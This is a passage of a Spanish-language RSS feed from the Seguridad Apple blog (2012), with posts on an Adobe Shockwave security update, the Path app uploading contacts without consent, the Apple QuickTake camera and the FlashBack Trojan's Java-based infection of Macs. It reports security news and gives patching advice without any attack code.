/&gt;&lt;/a&gt;Tenemos un nuevo boletín de seguridad de Adobe: &lt;a href="http://www.adobe.com/support/security/bulletins/apsb12-02.html"&gt;APSB12-02&lt;/a&gt; en el que informa de una actualización de  &lt;a href="http://www.adobe.com/products/shockwaveplayer"&gt;Adobe Shockwave Player&lt;/a&gt; que corrige &lt;u&gt;9 vulnerabilidades&lt;/u&gt; que podrían permitir a un atacante ejecutar código malicioso en el sistema afectado.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Adobe&lt;/b&gt;&lt;/i&gt; ha clasificado la actualización como &lt;i&gt;&lt;b&gt;crítica&lt;/b&gt;&lt;/i&gt; y recomienda que los usuarios realicen la actualización más reciente de la instalación del producto.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La nueva versión del software es &lt;i&gt;&lt;b&gt;11.6.4.634&lt;/b&gt;&lt;/i&gt; está disponible tanto para Mac OS X como para Windows  y se puede descargar desde la siguiente URL: &lt;a href="http://get.adobe.com/es/shockwave"&gt;Descargar Adobe Shockware Player&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La actualización, entre otras, resuelve una vulnerabilidad de corrupción de memoria en &lt;i&gt;&lt;b&gt;Shockwave 3d Asset&lt;/b&gt;&lt;/i&gt; que podría conducir a la ejecución de código (&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0757"&gt;CVE-2012-0757&lt;/a&gt;).&amp;nbsp;También soluciona las siguientes vulnerabilidades:&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0759"&gt;CVE-2012-0759&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0760"&gt;CVE-2012-0760&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0761"&gt;CVE-2012-0761&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0762"&gt;CVE-2012-0762&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0763"&gt;CVE-2012-0763&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0764"&gt;CVE-2012-0764&lt;/a&gt;,&amp;nbsp;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0766"&gt;CVE-2012-0766&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Todas estos fallos de seguridad pueden permitir a un atacante ejecutar código malicioso o  provocar una denegacion de servicio, por lo que desde &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt; os recomendamos que apliquéis la actualización en los equipos con Mac OS X que dispongan de la aplicación &lt;i&gt;&lt;b&gt;Adobe Shockwave Player&lt;/b&gt;&lt;/i&gt; lo antes posible. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-4837824418390829861?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=tMaS6qE3Jpg:rzHqF2W-NAg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=tMaS6qE3Jpg:rzHqF2W-NAg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=tMaS6qE3Jpg:rzHqF2W-NAg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/tMaS6qE3Jpg/actualizacion-critica-de-adobe.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-EzMBgwUQ4-4/Tzu3yTrdAWI/AAAAAAAADBQ/zSIvzHBTOb8/s72-c/Adobe-Shockwave.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/actualizacion-critica-de-adobe.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-6861215858010641564</guid><pubDate>Wed, 15 Feb 2012 07:12:00 +0000</pubDate><atom:updated>2012-02-15T08:12:47.648+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iPhone</category><category domain="http://www.blogger.com/atom/ns#">iPad</category><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><title>Path enviaba los contactos sin consentimiento del usuario</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-_6tAFvW305w/TztaKjSaHgI/AAAAAAAADBI/Z4_8sCWHQ_w/s1600/Path.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="190" src="http://1.bp.blogspot.com/-_6tAFvW305w/TztaKjSaHgI/AAAAAAAADBI/Z4_8sCWHQ_w/s200/Path.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Uno de los consejos que no se nos debe olvidar a la hora de instalar una aplicación es asegurarnos que esta sólo tiene permiso a los servicios/datos que necesita para su funcionamiento. Esto es una responsabilidad no sólo del usuario, que debe proteger la integridad de sus datos, sino también o sobre todo del desarrollador y de la empresa que hace esta aplicación. Esto se complica cuando la aplicación se instala en un terminal iOS en el que no se puede configurar demasiado la lista de permisos de la aplicación. &amp;nbsp;Así cuando existe una &lt;i&gt;“feature”&lt;/i&gt; desconocida que permite acceder a estos servicios/datos si nuestra intervención o permiso salta el escándalo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El asunto de &lt;a href="http://itunes.apple.com/es/app/path/id403639508?mt=8"&gt;Path&lt;/a&gt;, es uno de estos casos, ya que el investigador &lt;i&gt;&lt;b&gt;Arun Thampi,&lt;/b&gt;&lt;/i&gt; en un intento de realizar un port de la aplicación a &lt;i&gt;&lt;b&gt;Mac OS X&lt;/b&gt;&lt;/i&gt;, descubrió usando un proxy para analizar las peticiones que realizaba al API, que esta aplicación &lt;a href="http://mclov.in/2012/02/08/path-uploads-your-entire-address-book-to-their-servers.html"&gt;accede a la lista completa de los contactos para subir todos estos datos a sus servidores sin solicitar permiso para ello&lt;/a&gt;. &lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-It2DU87D8ek/TztZZIISu1I/AAAAAAAADBA/xnU2N7Na8Ik/s1600/Path.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-It2DU87D8ek/TztZZIISu1I/AAAAAAAADBA/xnU2N7Na8Ik/s640/Path.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Petición que envía todos los contactos a los servidores de Path sin avisar&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Tras el escándalo, los desarrolladores han explicado en su blog que esto lo hacían para mejorar la experiencia de usuario y &lt;a href="http://blog.path.com/post/17274932484/we-are-sorry"&gt;han pedido disculpas&lt;/a&gt;, es decir, que querían facilitar el trabajo informándonos cada vez que uno de nuestros contactos se instalaba &lt;i&gt;&lt;b&gt;Path&lt;/b&gt;&lt;/i&gt; para que pudiéramos agregarlo a nuestra lista de amigos sin problemas. Y en su defensa alegan que estos datos son transmitidos mediante una conexión cifrada y que se almacenan de forma segura.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ya sabemos que el caso de &lt;i&gt;&lt;b&gt;Path&lt;/b&gt;&lt;/i&gt; no es un caso aislado, de hecho muchas aplicaciones funcionan así, pero entendemos que no debería pasar en aplicaciones bajo el auspicio del &lt;i&gt;&lt;b&gt;Apple Store&lt;/b&gt;&lt;/i&gt; donde una de sus premisas es que &lt;i&gt;&lt;b&gt;“las aplicaciones no deben transmitir ningún tipo de datos sin el permiso explicito del usuario “&lt;/b&gt;&lt;/i&gt;. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La nueva versión de &lt;i&gt;&lt;b&gt;Path&lt;/b&gt;&lt;/i&gt; ha corregido este error, solicitando permiso al usuario para poder hacer uso o no de estos contactos. Ahora antes de aceptar un usuario precavido debería leerse la politica de privacidad para saber el uso que van a hacer de estos datos. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-6861215858010641564?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=uR7Asjyo8to:7jmEr8ZPFkk:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=uR7Asjyo8to:7jmEr8ZPFkk:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=uR7Asjyo8to:7jmEr8ZPFkk:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/uR7Asjyo8to/path-enviaba-los-contactos-sin.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-_6tAFvW305w/TztaKjSaHgI/AAAAAAAADBI/Z4_8sCWHQ_w/s72-c/Path.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-2444294148446374671</guid><pubDate>Tue, 14 Feb 2012 07:27:00 +0000</pubDate><atom:updated>2012-02-14T08:27:53.144+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">QuickTake</category><category domain="http://www.blogger.com/atom/ns#">Kodak</category><category domain="http://www.blogger.com/atom/ns#">Apple</category><category domain="http://www.blogger.com/atom/ns#">Historia</category><title>Apple QuickTake: Cámara digital de Apple que hizo Kodak</title><description>&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-M-duvNK5QfE/TzoK67aAAKI/AAAAAAAADAo/fQ0bBHO3i8E/s1600/Quicktake_Apple_100_camera.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="150" src="http://3.bp.blogspot.com/-M-duvNK5QfE/TzoK67aAAKI/AAAAAAAADAo/fQ0bBHO3i8E/s200/Quicktake_Apple_100_camera.jpg" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Apple QuickTake 100&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;A lo largo de este semestre la empresa &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt; anunció que dejará el negocio de las cámaras digitales  en un intento por solucionar su grave situación económica. A leer esta noticia nos pusimos nostálgicos ya que no debemos olvidar que &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt; fue el fabricante de los modelos 100 y 150 de la cámara digital &lt;a href="http://en.wikipedia.org/wiki/Apple_QuickTake"&gt;Apple QuickTake&lt;/a&gt; .&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La cámara &lt;i&gt;&lt;b&gt;Apple Quicktake 100&lt;/b&gt;&lt;/i&gt;, &amp;nbsp;que salió al mercado a mediados de los 90, &amp;nbsp;suponía una gran mejora respecto a la primera cámara digital de la historia que había sido creada en 1975 por &lt;i&gt;&lt;b&gt;Steve Sasson,&lt;/b&gt;&lt;/i&gt; un empleado de &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt;  que también trabajaría posteriormente en los modelos de cámara digital de Apple que hoy recordamos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Mientras que la primera cámara digital de la historia pesaba casi 4 kilogramos, llevaba 16 baterías, tardaba 23 segundos en lanzar una foto,  tenía capacidad para unas dos fotos de 0,1 Mpx y era en blanco y negro  La &lt;i&gt;&lt;b&gt;Apple Quicktake 100&lt;/b&gt;&lt;/i&gt; pesaba poco más de medio kilo, usaba 3 pilas AA, permitía realizar 8 fotografías con una resolución de 0,3 Mpx y realizaba fotos en 24 bits de color.  &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ujqmyjEI2Jw/TzoK8aGtP1I/AAAAAAAADAw/JLnVjL03fDI/s1600/quicktake100-2.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="150" src="http://4.bp.blogspot.com/-ujqmyjEI2Jw/TzoK8aGtP1I/AAAAAAAADAw/JLnVjL03fDI/s200/quicktake100-2.jpg" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="font-size: 13px; text-align: center;"&gt;&lt;i&gt;iPhone y Apple QuickTake 100&amp;nbsp;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;Estos datos parecen una broma si lo comparamos con las especificaciones actuales de la cámara que viene con &lt;i&gt;&lt;b&gt;iPhone 4S&lt;/b&gt;&lt;/i&gt; que, con apenas 140 gramos de peso, permite realizar fotos en segundos con una resolución de 8Mpx. Sin embargo, &lt;i&gt;&lt;b&gt;Apple QuickTake&lt;/b&gt;&lt;/i&gt; en aquella época suponían una revolución. &amp;nbsp;Posteriormente salieron al mercado los modelos 150 y 200 - la 200 no lo haría &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt; -, que añadían nuevas funcionalidades como la capacidad de borrar fotos, soporte de formatos JPG y BMP  - el modelo 100 sólo soportaba&amp;nbsp;&lt;i&gt;&lt;b&gt;PICT&lt;/b&gt;&lt;/i&gt; y&amp;nbsp;&lt;i&gt;&lt;b&gt;QuickTake&lt;/b&gt;&lt;/i&gt; - soporte para&lt;i&gt;&lt;b&gt;&amp;nbsp;Windows&lt;/b&gt;&lt;/i&gt;, mayor velocidad de obturación, etcétera.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Estas pesadas reliquias fueron retiradas del mercado en 1997, entre otros motivos porque su coste, de unos 700$, era muy elevado para la época.  Hoy en día, aunque han aparecido en listas de grandes fracasos tecnológicos en diversas ocasiones, estos gadgets de los 90 siguen despertando simpatías entre los fans de Apple y los adictos a la fotografía digital .&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-tjwh_Lz5dgE/TzoK8zLPznI/AAAAAAAADA0/GZzTTXsvkRE/s1600/quicktake150.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-tjwh_Lz5dgE/TzoK8zLPznI/AAAAAAAADA0/GZzTTXsvkRE/s1600/quicktake150.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Apple QuickTake 150&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para nostálgicos tenéis unos ejemplos de &lt;a href="http://citynoise.org/article/8958"&gt;fotos tomadas con una Apple Quicktake 150 en CityNoise&lt;/a&gt;&amp;nbsp;y podréis comprobar como el avance respecto a la digitalización de que se obtenía con el &lt;a href="http://www.seguridadapple.com/2012/01/apple-ii-ds-65-digiselector.html"&gt;DS-65 DigiSelector de Apple&lt;/a&gt; es considerable. Si queréis compraros alguna podéis &lt;a href="http://www.ebay.com/sch/i.html?_nkw=apple+quicktake"&gt;encontrar algunas en Ebay&lt;/a&gt; pero ojo estos modelos no soportan Mac OS X, y&amp;nbsp;si necesitas los drivers puedes localizarlos en &lt;a href="http://www.macdrivermuseum.net/scan.shtml"&gt;MacDriverMuseum&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-2444294148446374671?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=hj0JFs9VhTg:Z9Ev_R3BuOc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=hj0JFs9VhTg:Z9Ev_R3BuOc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=hj0JFs9VhTg:Z9Ev_R3BuOc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/hj0JFs9VhTg/apple-quicktake-camara-digital-de-apple.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-M-duvNK5QfE/TzoK67aAAKI/AAAAAAAADAo/fQ0bBHO3i8E/s72-c/Quicktake_Apple_100_camera.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/apple-quicktake-camara-digital-de-apple.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-3838390998219979862</guid><pubDate>Mon, 13 Feb 2012 06:22:00 +0000</pubDate><atom:updated>2012-02-13T07:32:37.114+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Snow Leopard</category><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">Flash</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidades</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><category domain="http://www.blogger.com/atom/ns#">Lion</category><category domain="http://www.blogger.com/atom/ns#">Leopard</category><title>FlashBack Trojan infecta Mac OS X sin intervenir usuario</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-kCSDRLFgMAc/TzdpYgtbgtI/AAAAAAAADAg/9PDoaAnIQag/s1600/OSX_Flashback.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-kCSDRLFgMAc/TzdpYgtbgtI/AAAAAAAADAg/9PDoaAnIQag/s1600/OSX_Flashback.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.seguridadapple.com/2011/09/osxflashback-troyano-para-mac-os-x.html"&gt;FlashBack Trojan&lt;/a&gt; es un malware que empezó a explotarse durante el mes de Septiembre de 2011. Recibió el nombre de &lt;i&gt;&lt;b&gt;FlashBack&lt;/b&gt;&lt;/i&gt; porque utilizaba como gancho para colarse dentro del sistema un truco de ingeniería social, simulando ser el instalador de &lt;i&gt;&lt;b&gt;Adobe Flash para Mac OS X&lt;/b&gt;&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
Continuó su evolución a lo largo de los meses siguientes, convirtiéndose en un malware mucho más dañino, y en la última versión ha seguido ese proceso.&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;- &lt;a href="http://www.seguridadapple.com/2011/10/osxflashback-ahora-troyaniza-apple.html"&gt;FlashBack: Ahora troyaniza Apple Safari&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
-&amp;nbsp;&lt;i&gt;&lt;a href="http://www.seguridadapple.com/2011/10/malware-osxflashbackc-detecta-vm-y.html"&gt;FlashBack.c: Detecta máquinas virtuales y anula XProtect&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;- &lt;a href="http://www.seguridadapple.com/2011/09/mas-sobre-osxflashback-cifrado-rc4-con.html"&gt;FlashBack: Uso de cifrado RC4 con Hashes MD5 del identificador de usuario&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.seguridadapple.com/2012/01/osxflashbackj-variante-de-flashback.html"&gt;FlashBack.j: Evolución para evitar nueva firma de XProtect&lt;/a&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Desde &lt;a href="http://blog.intego.com/new-flashback-trojan-horse-variant-uses-novel-delivery-method-to-infect-macs/"&gt;Intego han reportado&lt;/a&gt; que las nuevas versiones de &lt;i&gt;&lt;b&gt;FlashBack Trojan&lt;/b&gt;&lt;/i&gt; están utilizando dos vulnerabilidades de &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt; para instalarse en equipos Mac OS X con la versión de &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt; sin actualizar sin ninguna interacción con el usuario.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
